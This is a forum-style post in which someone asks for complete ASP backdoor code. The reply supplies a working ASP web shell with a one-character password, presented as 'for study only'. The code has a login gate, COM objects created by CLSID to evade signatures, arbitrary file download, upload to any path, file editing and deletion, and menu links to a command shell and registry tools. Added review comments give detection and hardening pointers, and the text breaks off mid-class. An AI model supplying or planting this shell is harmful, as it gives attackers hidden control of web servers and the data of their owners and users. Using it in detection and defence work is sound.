
誰能給我個完整asp後門木馬代碼

將以下文件保存問shell.asp 訪問密碼是1 僅供學習研究之用,慎重使用。

<%

' Login gate: the rest of the page is only reached when Session("webadmin") equals
' UserPass; otherwise this block writes a login form or an error text and ends the response.
' NOTE(review): the fixed ApplicationName string, the Session("webadmin") key and the
' one-character password below are stable strings to search for when scanning a web root.

dim ApplicationName,Pass,URL,ServerNM,ServerIP,Action,WWWRoot,FolderPath,FName,BackUrl,RW

' Raises the script timeout to 50000 seconds; a value this high is worth flagging in a scan.
Server.ScriptTimeout=50000

' From here on runtime errors do not stop execution, so failed operations pass silently.
On Error Resume Next

ApplicationName = "WebShell"

' UserPass is not in the dim list above (which declares Pass); it is created implicitly here.
UserPass = "1" ' set the password.

URL = Request.ServerVariables("URL")

ServerNM = Request.ServerVariables("SERVER_NAME")

ServerIP = Request.ServerVariables("LOCAL_ADDR")

' Request("x") without a collection name searches the query string, the form and the cookies,
' so Action, FolderPath and FName can arrive by GET or POST; nothing here validates them.
Action = Request("Action")

RootPath = Server.MapPath(".")

WWWRoot = Server.MapPath("/")

FolderPath = Request("FolderPath")

FName = Request("FName")

BackUrl = "<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"

' A matching Pass value from any request collection, including the query string, sets the
' session flag. A password sent by GET is normally written to the web server access log
' (URI query field), which gives responders a pivot for finding use of this page.
' No attempt limit or delay is visible in this block.
If Request("Pass")=UserPass then Session("webadmin")=UserPass

If Session("webadmin")<>UserPass Then

If Request.Form("Pass")<>"" Then

If Request.Form("Pass")=UserPass Then

Session("webadmin")=UserPass

Response.Redirect URL

Else

Response.Write"驗證失敗!"

End If

Else

' No password posted: build and write the login form. Its literal banner and button text
' are further static strings usable in a content signature.
RW="<center style='font-size:12px'><br><br>WKWL專用ASP木馬"

RW=RW & "<form action='" & URL & "' method='post'>"

RW=RW & "密碼:<input name='Pass' type='password' size='15' style='font-size: 12px;border: menu 1px solid'>"

RW=RW & "?<input type='submit' value='殺進去' style='border-width: 1px'></form></center>"

Response.Write RW

RW=""

End If

' Unauthenticated requests stop here; nothing below this block is sent to them.
Response.End

End If%>

<!-- Review note: these four server-side COM objects are created by classid, not by ProgID,
     so a content rule that matches only ProgID strings does not fire on these lines; rules
     for this file type should match the CLSID values as well.
     To my knowledge 72C24DD5-D70A-438B-8A42-98424B88AFB8 and F935DC22-1CF0-11D0-ADB9-00C04FD58A0B
     are WScript.Shell classes, 0D43FE01-F093-11CF-8940-00A0C9054228 is Scripting.FileSystemObject
     and 13709620-C279-11CE-A49E-444553540000 is Shell.Application; confirm against
     HKCR\CLSID on the host under investigation. The first two tags share id='ws'.
     Restricting the web application identity's access to these COM classes is the usual
     host-hardening step for classic ASP servers. -->
<object runat='server' id='ws' scope='page' classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8'></object>

<object runat='server' id='ws' scope='page' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>

<object runat='server' id='fso' scope='page' classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></object>

<object runat='server' id='sa' scope='page' classid='clsid:13709620-C279-11CE-A49E-444553540000'></object>

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title><%=ApplicationName&" - "&ServerIP%></title>

<style type="text/css">

<!--

body,td {font-size: 12px;}

body {margin-left: 0px;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;

<%If Action="" then response.write "overflow-x:hidden;overflow-y:hidden;"%>}

input,select,textarea {font-size: 12px;}

.border{border: menu 1px solid;}

.submit{border-width: 1px;}

a {color: black;text-decoration: none;}

-->

</style>

<script language="javascript">

function yesok(){

if (confirm("確認要執行此操作嗎?"))

return true;

else

return false;

}

function ShowFolder(Folder){

top.addrform.FolderPath.value = Folder;

top.addrform.submit();

}

function FullForm(FName,FAction){

top.hideform.FName.value = FName;

if(FAction=="CopyFile"){

DName = prompt("請輸入復制到目標文件全名稱",FName);

top.hideform.FName.value += "||||"+DName;

}else if(FAction=="MoveFile"){

DName = prompt("請輸入移動到目標文件全名稱",FName);

top.hideform.FName.value += "||||"+DName;

}else if(FAction=="CopyFolder"){

DName = prompt("請輸入移動到目標文件夾全名稱",FName);

top.hideform.FName.value += "||||"+DName;

}else if(FAction=="MoveFolder"){

DName = prompt("請輸入移動到目標文件夾全名稱",FName);

top.hideform.FName.value += "||||"+DName;

}else if(FAction=="NewFolder"){

DName = prompt("請輸入要新建的文件夾全名稱",FName);

top.hideform.FName.value = DName;

}else if(FAction=="CreateMdb"){

DName = prompt("請輸入要新建的Mdb文件全名稱,註意不能同名!",FName);

top.hideform.FName.value = DName;

}else if(FAction=="CompactMdb"){

DName = prompt("請輸入要壓縮的Mdb文件全名稱,註意文件是否存在!",FName);

top.hideform.FName.value = DName;

}else{

DName = "Other";

}

if(DName!=null){

top.hideform.Action.value = FAction;

top.hideform.submit();

}else{

top.hideform.FName.value = "";

}

}

function DbCheck(){

if(DbForm.DbStr.value == ""){

alert("請先連接數據庫");

FullDbStr(0);

return false;

}

return true;

}

function FullDbStr(i){

if(i<0){

return false;

}

Str = new Array(12);

Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=<%=RePath(Session("FolderPath"))%>\\DbName.mdb;Jet OLEDB:Database Password=***";

Str[1] = "Driver={Sql Server};Server=<%=ServerIP%>,1433;Database=DbName;Uid=sa;Pwd=****";

Str[2] = "Driver={MySql};Server=<%=ServerIP%>;Port=3306;Database=DbName;Uid=root;Pwd=****";

Str[3] = "Dsn=DsnName";

Str[4] = "SELECT * FROM [TableName] WHERE ID<100";

Str[5] = "INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')";

Str[6] = "DELETE FROM [TableName] WHERE ID=100";

Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";

Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";

Str[9] = "DROP TABLE [TableName]";

Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";

Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";

Str[12]= "當只顯示壹條數據時即可顯示字段的全部字節,可用條件控制查詢實現.\n超過壹條數據只顯示字段的前五十個字節。";

if(i<=3){

DbForm.DbStr.value = Str[i];

DbForm.SqlStr.value = "";

SFSO.innerHTML="<center>請確認己連接數據庫再輸入SQL操作命令語句。</center>";

}else if(i==12){

alert(Str[i]);

}else{

DbForm.SqlStr.value = Str[i];

}

return true;

}

function FullSqlStr(str,pg){

if(DbForm.DbStr.value.length<5){

alert("請檢查數據庫連接串是否正確!")

return false;

}

if(str.length<10){

alert("請檢查SQL語句是否正確!")

return false;

}

DbForm.SqlStr.value = str ;

DbForm.Page.value = pg;

SFSO.innerHTML="";

DbForm.submit();

return true;

}

function CheckAll(){

for (var i=0;i<DownId.length;i++) DownId[i].checked=!DownId[i].checked;

}

function Url(){

for (var i=0;i<DownId.length;i++)

{

if (DownId[i].checked==true)

{

temp.value+=DownId[i].value+"\n";

}

}

if (temp.value=="")

{

window.alert("妳還沒有選擇要下載的地址!");

return false;}

else

{

js=temp.createTextRange();

js.execCommand("Copy");

temp.value="";

window.alert("復制完畢!記得在復制之前打開下載工具監視剪貼板。");

}

}

</script>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

</head>

<body onmouseover="window.status='Powered by:Lzhj QQ:5079087';return true">

<%

' Lookup table of COM components: column 0 holds a ProgID, column 1 a display label.
' Other code in this file creates objects through the table (CreateObject(ObT(6,0)),
' CreateObject(ObT(0,0))), so the ProgID literal does not appear at those call sites;
' a scan that looks for ProgIDs next to CreateObject has to resolve this table.
' NOTE(review): for triage, the fourteen ProgIDs list the component families this page
' refers to: file system, command shell, Access/ADO database, stream, upload, mail, XMLHTTP.
Dim ObT(13,1)

ObT(0,0) = "Scripting.FileSystemObject"

ObT(0,1) = "文件操作組件"

ObT(1,0) = "wscript.shell"

ObT(1,1) = "命令行執行組件"

ObT(2,0) = "ADOX.Catalog"

ObT(2,1) = "ACCESS建庫組件"

ObT(3,0) = "JRO.JetEngine"

ObT(3,1) = "ACCESS壓縮組件"

ObT(4,0) = "Scripting.Dictionary"

ObT(4,1) = "數據流上傳輔助組件"

ObT(5,0) = "Adodb.connection"

ObT(5,1) = "數據庫連接組件"

ObT(6,0) = "Adodb.Stream"

ObT(6,1) = "數據流上傳組件"

ObT(7,0) = "SoftArtisans.FileUp"

ObT(7,1) = "SA-FileUp 文件上傳組件"

ObT(8,0) = "LyfUpload.UploadFile"

ObT(8,1) = "劉雲峰文件上傳組件"

ObT(9,0) = "Persits.Upload.1"

ObT(9,1) = "ASPUpload 文件上傳組件"

ObT(10,0) = "JMail.SmtpMail"

ObT(10,1) = "JMail 郵件收發組件"

ObT(11,0) = "CDONTS.NewMail"

ObT(11,1) = "虛擬SMTP發信組件"

ObT(12,0) = "SmtpMail.SmtpMail.1"

ObT(12,1) = "SmtpMail發信組件"

ObT(13,0) = "Microsoft.XMLHTTP"

ObT(13,1) = "數據傳輸組件"

Function IsObj(obt)

dim i,T

on error resume next

Set T=Server.CreateObject(obt)

If -2147221005 <> Err Then

IsObj=True

Else

IsObj=false

Err.Clear

End If

Set T=Nothing

End Function

sub ShowErr()

If Err Then

Response.Write"<br><a href='javascript:history.back()'>?" & Err.Description & "</a>"

Err.Clear:Response.Flush

End If

end sub

Function RePath(S)

RePath=Replace(S,"\","\\")

End Function

Function RRePath(S)

RRePath=Replace(S,"\\","\")

End Function

Function HTMLEncode(S)

if not isnull(S) then

S = replace(S, ">", ">")

S = replace(S, "<", "<")

S = replace(S, CHR(39), "'")

S = replace(S, CHR(34), """)

S = replace(S, CHR(20), "?")

HTMLEncode = S

end if

End Function

If FolderPath<>"" then

Session("FolderPath")=RRePath(FolderPath)

End If

If Session("FolderPath")="" Then

FolderPath=RootPath

Session("FolderPath")=FolderPath

End if

dim fso,osm,ads,rs,conn

Function MainMenu()

RW="<form name='hideform' method='post' action='" & URL & "' target='FileFrame'>"

RW=RW & "<input type='hidden' name='Action'><input type='hidden' name='FName'></form>"

RW=RW & "<table width='100%' height='100%' border='0' cellpadding='0' cellspacing='0' bgcolor='menu'>"

RW=RW & "<tr><td height='20'>"

RW=RW & "<table width='100%' height='20' border='0' cellpadding='0' cellspacing='0'>"

RW=RW & "<form name='addrform' method='post' action='" & URL & "' target='_parent'>"

RW=RW & "<tr><td width='60' align='center'>地址欄:</td><td>"

RW=RW & "<input name='FolderPath' style='width:100%' value='" & Session("FolderPath") & "' style='border:black 1px solid;'>"

RW=RW & "</td><td width='60' align='center'><input name='Submit' type='submit' value='轉到' class='submit'>"

RW=RW & "</td></tr></form></table></td></tr><tr><td height='20'>?文件操作:"

Set SFSO=New LBF:SFSO.ShowDriver():Set SFSO=Nothing

RW=RW & "<a href='javascript:ShowFolder(""C:\\Progra~1"")'>[程序文件]</a>?<a href='javascript:ShowFolder(""C:\\Docume~1"")'>[我的文檔]</a>?"

RW=RW & "<a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>[網站目錄]</a></tr></td><tr><td height='20'>"

RW=RW & "?切換功能:<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>[新建目錄]</a>?"

RW=RW & "<a href='?Action=EditFile' target='FileFrame'>[新建文本]</a>?<a href='?Action=UpFile' target='FileFrame'>[文件上傳]</a>?"

RW=RW & "<a href='?Action=CmdShell' target='FileFrame'>[CMD命令行]</a>?<a href='?Action=TSearch' target='FileFrame'>[搜索引擎]</a>?"

RW=RW & "<a href='?Action=Course' target='FileFrame'>[系統服務]</a>?<a href='?Action=TRegedit' target='FileFrame'>[註冊表操作]</a>?"

RW=RW & "<a href='?Action=ServerInfo' target='FileFrame'>[服務器信息]</a></td></tr><tr><td height='20'>?數據庫功能:<a href='?Action=DbManager' target='FileFrame'>[數據庫操作]</a>?"

RW=RW & "<a href='?Action=ToMdb' target='FileFrame'>[程序打包入庫/出庫]</a>?|?<a href='?Action=Logout' target='_top'>[退出登錄]</a>"

RW=RW & "<tr><td><iframe name='FileFrame' src='?Action=ShowFile' width='100%' height='100%' frameborder='1' scrolling='yes'></iframe></td></tr></table>"

Response.Write RW

RW=""

End Function

if request("DownFile")<>"" then call DownFile(request("DownFile"))

' Sends the file at Path to the client as an attachment and ends the response.
' Path is used exactly as passed; the call site in this file passes request("DownFile").
' Nothing in this function restricts Path to a directory, so any file readable by the
' web application's identity can be returned.
' NOTE(review): for detection, look for requests that carry a DownFile parameter to a
' script page and are answered with application/octet-stream plus a Content-Disposition
' header; for mitigation, limit what the application identity can read outside the site.
Function DownFile(Path)

' Drops any output already buffered for this response.
Response.Clear

' Errors (for example an unreadable Path) do not stop the function.
On Error Resume Next

' ObT(6,0) is "Adodb.Stream" in the component table defined earlier in this file.
Set osm = CreateObject(ObT(6,0))

osm.Open

' 1 selects the binary stream type.
osm.Type = 1

osm.LoadFromFile Path

' Index of the first character after the last backslash, i.e. the start of the file name.
sz=InstrRev(path,"\")+1

Response.AddHeader "Content-Disposition", "attachment; filename=" & Mid(path,sz)

Response.AddHeader "Content-Length",osm.Size

Response.Charset = "UTF-8"

Response.ContentType = "application/octet-stream"

Response.BinaryWrite osm.Read

Response.Flush

osm.Close

Set osm = Nothing

Response.End

End Function

Class LBF

Private Sub Class_Initialize

Set fso=CreateObject(ObT(0,0))

End Sub

Private Sub Class_Terminate

Set fso=Nothing

End Sub

Function ShowDriver()

dim D

For Each D in fso.Drives

RW=RW&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>磁盤["&D.DriveLetter&":]</a>?"

Next

ShowDriver=RW

End Function

Function ShowFile(Path)

dim F,L,Fold,i

RW="<table border='0' cellpadding='2' width='800' height='100%' bgcolor='#EFEFEF' align='center'>"

RW=RW & "<tr><td width='200' valign='top'>"

RW=RW & "<table border='0' cellpadding='0' cellspacing='0' width='100%'>"

RW=RW & "<tr><td width='100%'></td></tr>"

Set FOLD=fso.GetFolder(Path)

For Each F in FOLD.subfolders

RW=RW & "<tr><td width='100%' height='20'><a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")'>["&F.Name&"]</a>"

RW=RW & "?|<a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok()'>刪除</a>"

RW=RW & "?<a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")' onclick='return yesok()'>復制</a>"

RW=RW & "?<a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()'>移動</a></td></tr>"

Next

RW=RW & "</table></td><td width='600' valign='top' bgcolor='#FFFFFF'><table border='0' cellspacing='1' cellpadding='0' cellspacing='0' width='100%'>"

Response.Write RW : RW=""

For Each L in Fold.files

i=i+1

RW="<tr onMouseOver=""this.className='tr'"" onMouseOut=""this.className=''""> "

RW=RW & "<td width='45%' ><input type='checkbox' name='DownId' value='http://"&ServerNM&URL&"?Pass="&UserPass&"&DownFile="&RePath(Path&"\"&L.Name)&"'>"

RW=RW & "<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='下載'>"&L.Name&"</a></td>"

RW=RW & "<td width='10%'>"&clng(L.size/1024)&"K</td>"

RW=RW & "<td width='20%' align='center'>" & year(L.DateLastModified) & "-" & right("0"&month(L.DateLastModified),2) & "-" & right("0"&day(L.DateLastModified),2) & " " & FormatDateTime(L.DateLastModified,4)

RW=RW & "<td width='25%' align='center'><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")'>編輯</a>?"

RW=RW & "<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")' onclick='return yesok()'>刪除</a>?"

RW=RW & "<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")'>復制</a>?"

RW=RW & "<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")'>移動</a></td></td></tr>"

Response.Write RW : RW=""

Next

if i>0 then Response.Write "<tr><td><br><input type='checkbox' name='all' value='all' onClick='CheckAll()'>反向選擇?<input type='submit' value='批量下載' name='downurl' style='width:80' onClick='Url()' class='submit'><div style=display:'none'><textarea rows='0' name='temp' cols='0'></textarea></div></td></tr>"

i=0

Response.Write "</table></td></tr></table>"

Set FOLD=Nothing

End Function

Function EditFile(Path)

dim T

If Request("Action2")="Post" Then

Set T=fso.CreateTextFile(Path)

T.WriteLine Request.form("content")

T.close

Set T=Nothing

Set fso=Nothing

RW="<center><br><br><br>文件保存成功!</center>"

RW=RW & BackUrl

Response.Write RW : RW=""

Response.End

End If

If Path<>"" Then

Set T=fso.opentextfile(Path, 1, False)

On Error Resume Next

Txt=HTMLEncode(T.readall)

if err then err.Clear

T.close

Set T=Nothing

Else

Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件"

End If

RW="<br><table width='600' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"

RW=RW&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><tr><td height='20' align='center' bgcolor='menu'>文本編輯器</td></tr>"

RW=RW&"<tr><td bgcolor='#FFFFFF' align='center'><input name='Action' value='EditFile' Type='hidden'>"

RW=RW&"<input name='FName' value='"&Path&"' style='width:580' class='border'></td></tr>"

RW=RW&"<tr><td bgcolor='#FFFFFF' align='center'><textarea name='Content' style='width:580;height:450' class='border'>"&Txt&"</textarea></td></tr>"

RW=RW&"<tr><td bgcolor='#FFFFFF' align='center'><input name='goback' type='button' value='返回' onclick='history.back();' class='submit'><input name='reset' type='reset' value='重置' class='submit'><input name='submit' type='submit' value='保存' class='submit'>"

RW=RW&"</td></tr></form></table>"

Response.Write RW : RW=""

End Function

Function DelFile(Path)

If fso.FileExists(Path) Then

fso.DeleteFile Path

RW="<center><br><br><br>文件 "&Path&" 刪除成功!</center>"

RW=RW & BackUrl

Response.Write RW

End If

End Function

Function CopyFile(Path)

Path = Split(Path,"||||")

If fso.FileExists(Path(0)) and Path(1)<>"" Then

fso.CopyFile Path(0),Path(1)

RW="<center><br><br><br>文件" & Path(0) & "復制成功!</center>"

RW=RW & BackUrl

Response.Write RW : RW=""

End If

End Function

Function MoveFile(Path)

Path = Split(Path,"||||")

If fso.FileExists(Path(0)) and Path(1)<>"" Then

fso.MoveFile Path(0),Path(1)

RW="<center><br><br><br>文件" & Path(0) & "移動成功!</center>"

RW=RW & BackUrl

Response.Write RW : RW=""

End If

End Function

Function DelFolder(Path)

If fso.FolderExists(Path) Then

fso.DeleteFolder Path

RW="<center><br><br><br>目錄" & Path & "刪除成功!</center>"

RW=RW & BackUrl

Response.Write RW : RW=""

End If

End Function

Function CopyFolder(Path)

Path = Split(Path,"||||")

If fso.FolderExists(Path(0)) and Path(1)<>"" Then

fso.CopyFolder Path(0),Path(1)

RW="<center><br><br><br>目錄" & Path(0) & "復制成功!</center>"

RW=RW & BackUrl

Response.Write RW : RW=""

End If

End Function

Function MoveFolder(Path)

Path = Split(Path,"||||")

If fso.FolderExists(Path(0)) and Path(1)<>"" Then

fso.MoveFolder Path(0),Path(1)

RW="<center><br><br><br>目錄" & Path(0) & "移動成功!</center>"

RW=RW & BackUrl

Response.Write RW : RW=""

End If

End Function

Function NewFolder(Path)

If Not fso.FolderExists(Path) and Path<>"" Then

fso.CreateFolder Path

RW="<center><br><br><br>目錄" & Path & "新建成功!</center>"

RW=RW & BackUrl

Response.Write RW : RW=""

End If

End Function

End Class

' Upload handler. With Action2=Post it parses the posted body through the UPC class of this
' file and saves the uploaded part "LocalFile" under the path given in the form field
' "ToPath"; otherwise it writes the upload form. The target path comes from the request and
' is not checked here, so the write can land anywhere the application identity may write.
' NOTE(review): for detection, look for multipart POSTs whose URL carries
' Action=UpFile&Action2=Post and for new script files appearing under the web root; for
' mitigation, deny the application identity write access to directories where scripts execute.
Function UpFile()

' strFileName is declared but not used in this function.
dim strFileName

If Request("Action2")="Post" Then

' U.UA returns the stored entry for the named part, or a new FIF object when it is absent.
Set U=new UPC : Set F=U.UA("LocalFile")

UName=U.form("ToPath")

If UName="" Or F.FileSize=0 then

RW="<br>請輸入上傳的完全路徑後選擇壹個文件上傳!"

Else

' SaveAs belongs to a class not shown in this part of the file; presumably it writes the
' uploaded bytes to UName (confirm against the FIF class).
F.SaveAs UName

If Err.number=0 Then

RW="<center><br><br><br>文件" & UName & "上傳成功!</center>"

End if

End If

Set F=nothing:Set U=nothing

RW=RW & BackUrl

Response.Write RW

' ShowErr, defined earlier in this file, writes Err.Description when an error is pending.
ShowErr()

Response.End

End If

' No upload posted: build the form. The default target is a file named newup.asp in the
' folder held in Session("FolderPath").
RW="<br><table width='600' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"

RW=RW & "<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"

RW=RW & "<tr><td height='20' align='center' bgcolor='menu'>上傳文件</td></tr>"

RW=RW & "<tr><td align='center' bgcolor='#FFFFFF'>"

RW=RW & "上傳路徑:<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\newup.asp")&"' style='width:250' class='border'>?"

RW=RW & "<input name='LocalFile' type='file' style='width:225' class='border'>?"

RW=RW & "<input type='submit' name='Submit' value='上傳' class='submit'>"

RW=RW & "</td></tr></form></table>"

Response.Write RW

End Function

Dim T1

Class UPC

Dim D1,D2

Public Function Form(F)

F=lcase(F)

If D1.exists(F) then:Form=D1(F):else:Form="":end if

End Function

Public Function UA(F)

F=lcase(F)

If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if

End Function

Private Sub Class_Initialize

Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName

set D1=CreateObject("Scripting.Dictionary")

if Request.TotalBytes<1 then Exit Sub

set T1 = CreateObject(ObT(6,0))

T1.Type = 1 : T1.Mode =3 : T1.Open

T1.Write Request.BinaryRead(Request.TotalBytes)

T1.Position=0 : TDa =T1.Read : DStart = 1

DEnd = LenB(TDa)

set D2=CreateObject("Scripting.Dictionary")

vbCrlf = chrB(13) & chrB(10)

set T2 = CreateObject(ObT(6,0))

TSt
